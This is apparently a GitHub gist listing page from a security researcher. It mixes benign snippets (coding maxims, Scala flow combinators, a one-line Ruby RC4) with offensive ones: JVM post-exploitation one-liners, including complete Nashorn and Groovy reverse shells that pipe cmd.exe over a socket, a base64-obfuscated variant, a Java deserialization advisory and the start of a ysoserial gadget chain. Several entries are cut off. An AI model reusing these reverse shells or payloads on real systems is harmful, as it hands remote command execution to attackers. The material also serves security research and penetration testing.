Chris Frohoff frohoff

@frohoff
frohoff / COMMANDMENTS.md
Last active May 10, 2016 20:54
Commandments
  • Thou shalt place time/space/resource constraints on all otherwise open-ended operations
    • e.g., timeouts, result counts, input sizes
  • Thou shalt strive to measure any quantitative values that can vary over time or across samples
    • e.g., response times/counts, error counts
  • Thou shalt not accept, store, transmit, or display a numerical value without its respective units or context
    • e.g., timezones, metric/binary prefixes
@frohoff
frohoff / JVM_POST_EXPLOIT.md
Last active December 13, 2023 15:02
JVM Post-Exploitation One-Liners

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
@frohoff
frohoff / revsh.js
Created March 22, 2016 18:12
Nashorn Javascript Reverse Shell
var host="localhost";
var port=8044;
var cmd="cmd.exe";
var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();
@frohoff
frohoff / revsh.groovy
Created March 2, 2016 18:55
Pure Groovy/Java Reverse Shell
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
@frohoff
frohoff / JAVA-ADVISORY.md
Last active August 28, 2023 19:08
Java 7u21 Security Advisory

Security Advisory – Java SE

Chris Frohoff – Qualcomm Information Security and Risk Management

Introduction

  • Affected Product(s): Java SE 6, Java SE 7
  • Fixed in: Java SE 7u25 (2013-06-18), Java SE 8 (2014-03-18)
  • Vendor Contact: secalert_us@oracle.com
  • Vulnerability Type: Unsafe Object Deserialization
@frohoff
frohoff / CommonsBeanutilsCollectionsLogging1.java
Created November 19, 2015 14:15
commons beanutils gadget chain
package ysoserial.payloads;
import java.math.BigInteger;
import java.util.Arrays;
import java.util.PriorityQueue;
import java.util.Queue;
import org.apache.commons.beanutils.BeanComparator;
import ysoserial.payloads.annotation.Dependencies;
#!/usr/bin/env ruby
require 'open3'
def replace(md, strip=false)
rex = /```([a-zA-Z]+)\n(([^`\n]{3,}\n)*)```\s*```mdexec\n([^`\n]{3,}\n)*```/
replaced = md.gsub(rex) do |rep|
int, code = $1, $2
if !strip
@frohoff
frohoff / gist:db15cb9244e5a6184ab3
Created May 7, 2015 20:20
functional composition flow
object Test extends App {
lazy val flow: SplunkEvent => Seq[Email[Alert]] =
receiveEvent andTap rawTap andThen
convertToSecurityEvent andMaybeTap eventTap andMaybe
classifyIfTrained andMaybeTap classificationTap andMaybeSeq
aggregateByTimeWindow andForEach (_.sortBy(_.event.time)) andForEach
convertToAlert andForEachTap alertTap andForEachOpt
createEmail andForEachTap emailTap
}
@frohoff
frohoff / Flow.scala
Last active August 29, 2015 14:20
monadish reactive flow combinators
package org.frohoff.flow
import scala.collection.mutable.Buffer
import Flow._
object Test extends App {
val f: Flow[Int,Int] = Flow[Int]
val f2: Flow[Int,String] = f.map(_.toHexString)
val f3: Flow[Int,Option[Int]] = f.map(Option(_))
//f3.flatten // doesn't compile yet
@frohoff
frohoff / terse-rc4.rb
Last active December 13, 2023 15:02
terse ruby rc4 (161 chars, 154 chars not counting proc/param overhead) for https://twitter.com/matthew_d_green/status/524966294492577792
->t,k{s=*0..255;j=0;m=256;m.times{|i|j=(j+s[i]+k[i%k.size])%m;s[i],s[j]=s[j],s[i]};i=j=0;t.map{|b|i=(i+1)%m;j=(j+s[i])%m;s[i],s[j]=s[j],s[i];b^s[(s[i]+s[j])%m]}}